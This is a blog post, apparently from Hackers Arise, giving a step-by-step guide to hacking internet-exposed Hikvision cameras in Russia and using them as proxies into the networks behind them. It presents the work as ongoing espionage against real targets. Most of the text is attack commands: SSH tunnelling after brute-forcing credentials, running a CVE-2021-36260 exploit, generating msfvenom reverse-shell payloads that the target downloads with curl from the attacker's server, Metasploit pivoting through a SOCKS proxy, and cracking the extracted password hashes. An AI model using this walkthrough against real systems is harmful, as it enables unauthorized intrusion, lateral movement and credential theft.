Part 1 Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into […]
The post Network Espionage: Using Russian Cameras as Proxy first appeared on Hackers Arise.
Part 1
Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into Moscow.
This time, we’re taking it further and showing how compromising a camera can give you access to the network behind it.
Now let’s say you’ve compromised a camera and want to pivot deeper into the network. We’ll walk through a few examples, starting with enabling SSH and ending with deploying payloads using unpatched vulnerabilities. In part 2 and 3 you will learn how to analyze and modify the firmware.
Case 1: Hikvision
Hikvision is one of the most common camera brands used across Russia. As shown in the screenshot below, thousands of their devices are exposed online via Shodan. Many of them still haven’t been patched against known vulnerabilities like CVE-2021-36260, even in 2025. This vulnerability can give you shell access on the device.
If you brute-force a password and get into the web interface, go to the settings and enable SSH. This setting is often available on Hikvision cameras and sometimes on other brands.
Once SSH is on, set up an SSH tunnel to route your traffic through the camera with the same credentials:
kali > ssh -D 9050 -4 admin@
If credentials work, you’re in. Sometimes the SSH port expects a different set of credentials. Remember, the SSH setting might automatically disable after a while, so you’ll need to re-enable it via the dashboard.
Now configure proxychains:
kali > sudo nano /etc/proxychains4.conf
Make sure the port (9050) matches what you used in the SSH tunnel. With this setup, you can begin scanning the internal network. Most cameras aren’t segmented from other devices, so once you’re inside, you can talk to almost anything. Let’s do a basic network scan through the camera. Note that in the example below I used a different port:
kali > proxychains4 nmap 192.168.1.0/24 -Pn
If nmap isn’t available, use nc:
kali > proxychains4 nc -zv 192.168.1.15 445
For easier subnet scanning, you can automate this with a simple bash loop. It’s important to know how to scan hosts with nc, because your target might not have all the necessary tools installed.
Case 2: CVE-2021-36260
This Hikvision vulnerability is still unpatched on many systems. If you find a target with this flaw, run the exploit like this:
kali > git clone https://github.com/Aiminsun/CVE-2021-36260
kali > cd CVE-2021-36260
kali > python3 CVE-2021-36260.py –rport
Once you have a shell, you will need a payload to turn the camera into a network proxy. Let’s see how to generate the right payload based on the device’s architecture.
Architecture
Fist you want to determine the architecture of the target:
target > uname -m
Common outputs and what they mean:
x86 or i686: 32-bit Intel
x86_64: 64-bit Intel
armv7l: ARM
mips, mipsel: MIPS variants
Payload Generation
For 32-bit Intel:
kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
For 64-bit Intel:
kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=
For ARM:
kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=
For MIPS:
kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=
Once generated, upload and run the payload.
File Upload
Simply use curl while hosting a payload on an HTTP server. First go to the directory where the payload was generated and then set up an HTTP server:
kali > cd payload
kali > python3 -m http.server
target > curl -O http://kali_ip:8000/shell.elf
target > chmod +x shell.elf
target > ./shell.elf
If you have an SSH port open, you can use this:
kali > scp shell.elf admin@
target > cd /tmp
target > chmod +x shell.elf
target > ./shell.elf
Listener
On your machine, set up a handler with the same payload to receive the connection.
Meterpreter Proxy
Once we get a Meterpreter session back, we need to set up routing. Routing in Metasploit defines which hosts are reachable through a session:
Meterpreter > run autoroute -s 192.168.1.0/24
Meterpreter > background
msf6 > use auxiliary/server/socks_proxy
msf6 > run -j
Here is how the module should be configured. If needed, update your proxychains4.conf to point to your proxy (9050), and now you can scan and move within the internal network as needed, just like in the first case.
Bonus: Cracking Hashes
There is yet another way to get into Hikvision cameras. In some cases, the firewall blocks your attempt to land a shell using the –shell option from the CVE-2021-36260 exploit. When that happens, you can fall back on brute forcing the password hash from the admin panel.
Start by using the command below to try and extract the contents of the /etc/ directory:
python3 CVE-2021-36260.py –rhost
The exploit doesn’t allow for complex commands, so you need to be efficient. You won’t be able to split the payload like we will be doing in Part 2. Instead, you want to quickly locate the file that holds the hashes.
Once you have the hash copied, move to cracking it. Hikvision has a built-in requirement for all passwords to be at least 8 characters long. So, before starting hashcat, filter your wordlist:
awk ‘length($0) >= 8’ rockyou.txt > wordlist.txt
This will save time and skip unnecessary short entries. Cracking the hash is resource-intensive and may take a while depending on your hardware and the complexity of the password. Run hashcat using mode 500 (MD5 crypt) as shown below:
hashcat -m 500 hash.txt wordlist.txt
Let it run and monitor for successful recovery. With persistence and enough dictionary strength, you’ll eventually crack the password. Once done, use it to log in via the web interface or SSH , if you later enable it. This method is slower than others but effective when shell payloads fail. Keep it in your toolkit when other vectors are closed.
Conclusion
As shown, some cameras are easy to turn into a stepping stone. All you need is a working password, an unpatched vulnerability or a good wordlist. Since cameras are rarely segmented from the main network, once you’re in, you have potential access to everything. They make excellent proxies for network reconnaissance or further attacks.
In the following parts, we’ll cover firmware reverse engineering and modification. Things will get more advanced. Stay tuned.
The post Network Espionage: Using Russian Cameras as Proxy first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/